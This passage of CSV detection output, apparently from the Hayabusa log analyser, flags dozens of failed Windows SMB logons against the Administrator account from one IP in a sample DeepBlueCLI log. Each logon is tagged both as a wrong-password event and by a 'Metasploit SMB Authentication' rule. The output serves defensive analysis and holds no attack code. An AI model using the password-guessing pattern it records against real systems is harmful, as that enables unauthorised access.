NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxqIpDLlnf6Xyc34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTCTTYmKTIzzJwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oD3dLxlB3qWIhZEQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fe9xMOoCxPJIIyVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DW3YgBZYiGTeEw66 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VAKeeIcOeiQ3H9NF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nmF3ot3gJCsBlSwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDjoResfZvvVqqE5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V4dwzMwvVtzztGwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qklApBFOMxVzucD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0IJSphtLB3eNARBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLOFe4w5KpJ2UaGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3JTWkGadY1fJE2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyTH0jxSZB2YVdhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NRq5XrcDkFvabCzh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlYwlgrsMy1kSgEC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AchwW4ifbZ41AQNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PaxF7Q8ue1Kex1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WAhW2PErXdwNVrx5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoAV3ESqieev2JMC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFlWFijaFirgsAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSDjuqvzKLaWCWVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SL0CVu787iFRLiPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZQDORN33izpv4tGO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v470yorD43fgGyjC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBbLWVZFDqFxb7dW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RJsowt9MrhXciLOZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uhCVFyMmDI5shASV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yd4SM9EGM7cnO6Z5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSR1tbtzdDaJDbXs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rNqyjBuN0Pq6WRO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vqpMAmE9OvHbFCh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfLQAaB0DPvxWQMB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0kvHMwnj2k0HMLQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kPqfVDftcR4iRDaw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bltwm2g13InAJM6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: J2iFr8ppe5NzukXF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EEUOBohBFRze6hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCOFn3WM71KmaZyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UdUkBxB1auduRfdS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2JaWoYK56HRGfW1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3JTCX9NIOpg6TFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zFGkdUVAdKcrrREB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oZW00FpKema01Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p4HbNQx0Acf83b1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aM5UCQbOLvcpI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
